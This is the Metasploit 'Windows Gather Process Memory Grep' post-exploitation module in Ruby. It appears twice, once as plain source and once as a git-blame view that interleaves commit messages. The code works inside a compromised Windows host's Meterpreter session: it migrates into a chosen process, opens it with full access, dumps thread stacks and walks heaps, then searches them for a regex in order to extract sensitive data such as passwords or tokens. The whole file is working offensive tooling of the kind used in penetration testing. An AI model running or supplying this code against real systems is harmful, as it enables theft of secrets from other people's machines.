metasploit-framework/modules/post/windows/gather/memory_grep.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Post

	def initialize(info={})
		super( update_info(info,
			'Name'           => 'Windows Gather Process Memory Grep',
			'Description'    => %q{
					This module allows for searching the memory space of a proccess for potentially
				sensitive data.  Please note: This module will have to migrate to the process you
				are grepping, and will not migrate back automatically.  This means that if the user
				terminates the application after using this module, you may lose your session.
			},
			'License'        => MSF_LICENSE,
			'Author'         => ['bannedit'],
			'Platform'       => ['win'],
			'SessionTypes'   => ['meterpreter' ]
		))
		register_options([
			OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]),
			OptRegexp.new('REGEX',   [true, 'Regular expression to search for with in memory', nil])
		], self.class)
	end

	def dump_data(target_pid)
		# we need to be inside the process to walk the heap using railgun
		current = client.sys.process.getpid
		if target_pid != current
			print_status("Migrating into #{target_pid} to allow for dumping heap data")
			session.core.migrate(target_pid)
		end

		regex = datastore['REGEX']
		stack = []
		proc = client.sys.process.open(target_pid, PROCESS_ALL_ACCESS)

		begin
			threads = proc.thread.each_thread do |tid|
				thread = proc.thread.open(tid)
				esp = thread.query_regs['esp']
				addr = proc.memory.query(esp)
				vprint_status("Found Thread TID: #{tid}\tBaseAddress: 0x%08x\t\tRegionSize: %d bytes" % [addr['BaseAddress'], addr['RegionSize']])
				data = proc.memory.read(addr['BaseAddress'], addr['RegionSize'])
				stack << {
							'Address' => addr['BaseAddress'],
							'Size' => addr['RegionSize'],
							'Handle' => thread.handle,
							'Data' => data
						}
					end
		rescue
		end

		heap = []
		railgun = session.railgun
		heap_cnt = railgun.kernel32.GetProcessHeaps(nil, nil)['return']
		dheap = railgun.kernel32.GetProcessHeap()['return']
		vprint_status("Default Process Heap: 0x%08x" % dheap)
		ret = railgun.kernel32.GetProcessHeaps(heap_cnt, heap_cnt * 4)
		pheaps = ret['ProcessHeaps']

		idx = 0
		handles = []
		while idx != pheaps.length
			vprint_status("Found Heap: 0x%08x" % pheaps[idx, 4].unpack('V')[0])
			handles << pheaps[idx, 4].unpack('V')[0]
			idx += 4
		end

		print_status("Walking the heap... this could take some time")
		heap = []
		handles.each do |handle|
			lpentry = "\x00" * 42
			ret = ''
			while (ret = railgun.kernel32.HeapWalk(handle, lpentry)) and ret['return']
				entry = ret['lpEntry'][0, 4].unpack('V')[0]
				pointer = proc.memory.read(entry, 512)
				size = ret['lpEntry'][4, 4].unpack('V')[0]
				data = proc.memory.read(entry, (size == 0) ? 1048576 : size)
				heap << {
					'Address' => entry,
					'Size' => data.length,
					'Handle' => handle,
					'Data' => data
				} if data.length > 0
				lpentry = ret['lpEntry']
				break if ret['GetLastError'] == 259 or size == 0
			end
		end

		matches = []
		stack.each do |mem|
			idx = mem['Data'].index(regex)

			if idx != nil
				print_status("Match found on stack!")
				print_line
				data = mem['Data'][idx, 512]
				print_line(Rex::Text.to_hex_dump(data))
			end
		end

		heap.each do |mem|
			idx = mem['Data'].index(regex)

			if idx != nil
				print_status("Match found on heap!")
				print_line
				data = mem['Data'][idx, 512]
				print_line(Rex::Text.to_hex_dump(data))
			end
		end
	end

	def run
		if session.type != "meterpreter"
			print_error "Only meterpreter sessions are supported by this post module"
			return
		end

		print_status("Running module against #{sysinfo['Computer']}")

		proc_name = datastore['PROCESS']

		# Collect PIDs
		pids = []
		client.sys.process.processes.each do |p|
			pids << p['pid'] if p['name'] == proc_name
		end

		if pids.empty?
			print_error("No PID found for #{proc_name}")
			return
		end

		print_status("PIDs found for #{proc_name}: #{pids * ', '}")

		pids.each do |pid|
			print_status("Searching in process: #{pid.to_s}...")
			dump_data(pid)
			print_line
		end

	end
end
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Post`

			`def initialize(info={})`
			`super( update_info(info,`
			`'Name' => 'Windows Gather Process Memory Grep',`
Msftidy: knocking out all those trailing spaces. Screw those guys. git-svn-id: file:///home/svn/framework3/trunk@13967 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-17 03:49:49 +00:00			`'Description' => %q{`
Updates module description, and uses the proper func for hex dump As an user, it's important to know that using this module may result a lost session because it must migrate to grep memory, but does not migrate back. The module also has its own hex dump routine, which is no longer needed because we have a built-in Rex::Text.to_hex_dump 2013-06-28 21:28:00 +00:00			`This module allows for searching the memory space of a proccess for potentially`
			`sensitive data. Please note: This module will have to migrate to the process you`
			`are grepping, and will not migrate back automatically. This means that if the user`
			`terminates the application after using this module, you may lose your session.`
big msftidy pass, ping me if there are issues git-svn-id: file:///home/svn/framework3/trunk@14034 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-23 11:56:13 +00:00			`},`
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00			`'License' => MSF_LICENSE,`
			`'Author' => ['bannedit'],`
Platform windows cleanup Change all Platform 'windows' to 'win', as it internally is an alias anyway and only causes unnecessary confusion to have two platform names that mean the same. 2012-10-23 18:33:01 +00:00			`'Platform' => ['win'],`
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00			`'SessionTypes' => ['meterpreter' ]`
			`))`
big msftidy pass, ping me if there are issues git-svn-id: file:///home/svn/framework3/trunk@14034 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-23 11:56:13 +00:00			`register_options([`
			`OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]),`
Fix multiple issues with memory_grep This fixes the following: [FixRM:#8118] - Allows the module to be able to enumerate from multiple processes with the same name. [FixRM:#8120] - Allows the module to be able to actually read data from the heap. 2013-07-01 23:57:00 +00:00			`OptRegexp.new('REGEX', [true, 'Regular expression to search for with in memory', nil])`
big msftidy pass, ping me if there are issues git-svn-id: file:///home/svn/framework3/trunk@14034 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-23 11:56:13 +00:00			`], self.class)`
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00			`end`

Fix multiple issues with memory_grep This fixes the following: [FixRM:#8118] - Allows the module to be able to enumerate from multiple processes with the same name. [FixRM:#8120] - Allows the module to be able to actually read data from the heap. 2013-07-01 23:57:00 +00:00			`def dump_data(target_pid)`
			`# we need to be inside the process to walk the heap using railgun`
			`current = client.sys.process.getpid`
			`if target_pid != current`
			`print_status("Migrating into #{target_pid} to allow for dumping heap data")`
			`session.core.migrate(target_pid)`
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00			`end`

Fix multiple issues with memory_grep This fixes the following: [FixRM:#8118] - Allows the module to be able to enumerate from multiple processes with the same name. [FixRM:#8120] - Allows the module to be able to actually read data from the heap. 2013-07-01 23:57:00 +00:00			`regex = datastore['REGEX']`
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00			`stack = []`
Fix multiple issues with memory_grep This fixes the following: [FixRM:#8118] - Allows the module to be able to enumerate from multiple processes with the same name. [FixRM:#8120] - Allows the module to be able to actually read data from the heap. 2013-07-01 23:57:00 +00:00			`proc = client.sys.process.open(target_pid, PROCESS_ALL_ACCESS)`
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00
			`begin`
Fix multiple issues with memory_grep This fixes the following: [FixRM:#8118] - Allows the module to be able to enumerate from multiple processes with the same name. [FixRM:#8120] - Allows the module to be able to actually read data from the heap. 2013-07-01 23:57:00 +00:00			`threads = proc.thread.each_thread do \|tid\|`
			`thread = proc.thread.open(tid)`
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00			`esp = thread.query_regs['esp']`
Fix multiple issues with memory_grep This fixes the following: [FixRM:#8118] - Allows the module to be able to enumerate from multiple processes with the same name. [FixRM:#8120] - Allows the module to be able to actually read data from the heap. 2013-07-01 23:57:00 +00:00			`addr = proc.memory.query(esp)`
Msftidy: knocking out all those trailing spaces. Screw those guys. git-svn-id: file:///home/svn/framework3/trunk@13967 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-17 03:49:49 +00:00			`vprint_status("Found Thread TID: #{tid}\tBaseAddress: 0x%08x\t\tRegionSize: %d bytes" % [addr['BaseAddress'], addr['RegionSize']])`
Fix multiple issues with memory_grep This fixes the following: [FixRM:#8118] - Allows the module to be able to enumerate from multiple processes with the same name. [FixRM:#8120] - Allows the module to be able to actually read data from the heap. 2013-07-01 23:57:00 +00:00			`data = proc.memory.read(addr['BaseAddress'], addr['RegionSize'])`
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00			`stack << {`
			`'Address' => addr['BaseAddress'],`
			`'Size' => addr['RegionSize'],`
			`'Handle' => thread.handle,`
			`'Data' => data`
			`}`
			`end`
			`rescue`
			`end`

			`heap = []`
no need for railgun_setup git-svn-id: file:///home/svn/framework3/trunk@13230 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 18:05:59 +00:00			`railgun = session.railgun`
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00			`heap_cnt = railgun.kernel32.GetProcessHeaps(nil, nil)['return']`
			`dheap = railgun.kernel32.GetProcessHeap()['return']`
vprint_status! git-svn-id: file:///home/svn/framework3/trunk@13227 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:38:24 +00:00			`vprint_status("Default Process Heap: 0x%08x" % dheap)`
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00			`ret = railgun.kernel32.GetProcessHeaps(heap_cnt, heap_cnt * 4)`
			`pheaps = ret['ProcessHeaps']`

			`idx = 0`
			`handles = []`
			`while idx != pheaps.length`
vprint_status! git-svn-id: file:///home/svn/framework3/trunk@13227 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:38:24 +00:00			`vprint_status("Found Heap: 0x%08x" % pheaps[idx, 4].unpack('V')[0])`
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00			`handles << pheaps[idx, 4].unpack('V')[0]`
			`idx += 4`
			`end`

			`print_status("Walking the heap... this could take some time")`
Fix multiple issues with memory_grep This fixes the following: [FixRM:#8118] - Allows the module to be able to enumerate from multiple processes with the same name. [FixRM:#8120] - Allows the module to be able to actually read data from the heap. 2013-07-01 23:57:00 +00:00			`heap = []`
			`handles.each do \|handle\|`
			`lpentry = "\x00" * 42`
			`ret = ''`
			`while (ret = railgun.kernel32.HeapWalk(handle, lpentry)) and ret['return']`
			`entry = ret['lpEntry'][0, 4].unpack('V')[0]`
			`pointer = proc.memory.read(entry, 512)`
			`size = ret['lpEntry'][4, 4].unpack('V')[0]`
			`data = proc.memory.read(entry, (size == 0) ? 1048576 : size)`
			`heap << {`
			`'Address' => entry,`
			`'Size' => data.length,`
			`'Handle' => handle,`
			`'Data' => data`
			`} if data.length > 0`
			`lpentry = ret['lpEntry']`
			`break if ret['GetLastError'] == 259 or size == 0`
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00			`end`
			`end`

			`matches = []`
			`stack.each do \|mem\|`
			`idx = mem['Data'].index(regex)`

			`if idx != nil`
Fix multiple issues with memory_grep This fixes the following: [FixRM:#8118] - Allows the module to be able to enumerate from multiple processes with the same name. [FixRM:#8120] - Allows the module to be able to actually read data from the heap. 2013-07-01 23:57:00 +00:00			`print_status("Match found on stack!")`
Updates module description, and uses the proper func for hex dump As an user, it's important to know that using this module may result a lost session because it must migrate to grep memory, but does not migrate back. The module also has its own hex dump routine, which is no longer needed because we have a built-in Rex::Text.to_hex_dump 2013-06-28 21:28:00 +00:00			`print_line`
No need for the 2nd element 2013-06-28 22:05:43 +00:00			`data = mem['Data'][idx, 512]`
			`print_line(Rex::Text.to_hex_dump(data))`
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00			`end`
			`end`

			`heap.each do \|mem\|`
			`idx = mem['Data'].index(regex)`

			`if idx != nil`
Fix multiple issues with memory_grep This fixes the following: [FixRM:#8118] - Allows the module to be able to enumerate from multiple processes with the same name. [FixRM:#8120] - Allows the module to be able to actually read data from the heap. 2013-07-01 23:57:00 +00:00			`print_status("Match found on heap!")`
Updates module description, and uses the proper func for hex dump As an user, it's important to know that using this module may result a lost session because it must migrate to grep memory, but does not migrate back. The module also has its own hex dump routine, which is no longer needed because we have a built-in Rex::Text.to_hex_dump 2013-06-28 21:28:00 +00:00			`print_line`
No need for the 2nd element 2013-06-28 22:05:43 +00:00			`data = mem['Data'][idx, 512]`
			`print_line(Rex::Text.to_hex_dump(data))`
Added memory_grep post module and updated the GetProcessHeaps definition in railgun git-svn-id: file:///home/svn/framework3/trunk@13225 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-19 17:06:26 +00:00			`end`
			`end`
			`end`
Fix multiple issues with memory_grep This fixes the following: [FixRM:#8118] - Allows the module to be able to enumerate from multiple processes with the same name. [FixRM:#8120] - Allows the module to be able to actually read data from the heap. 2013-07-01 23:57:00 +00:00
			`def run`
			`if session.type != "meterpreter"`
			`print_error "Only meterpreter sessions are supported by this post module"`
			`return`
			`end`

			`print_status("Running module against #{sysinfo['Computer']}")`

			`proc_name = datastore['PROCESS']`

			`# Collect PIDs`
			`pids = []`
			`client.sys.process.processes.each do \|p\|`
			`pids << p['pid'] if p['name'] == proc_name`
			`end`

			`if pids.empty?`
			`print_error("No PID found for #{proc_name}")`
			`return`
			`end`

			`print_status("PIDs found for #{proc_name}: #{pids * ', '}")`

			`pids.each do \|pid\|`
			`print_status("Searching in process: #{pid.to_s}...")`
			`dump_data(pid)`
			`print_line`
			`end`

			`end`
Msftidy: knocking out all those trailing spaces. Screw those guys. git-svn-id: file:///home/svn/framework3/trunk@13967 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-17 03:49:49 +00:00			`end`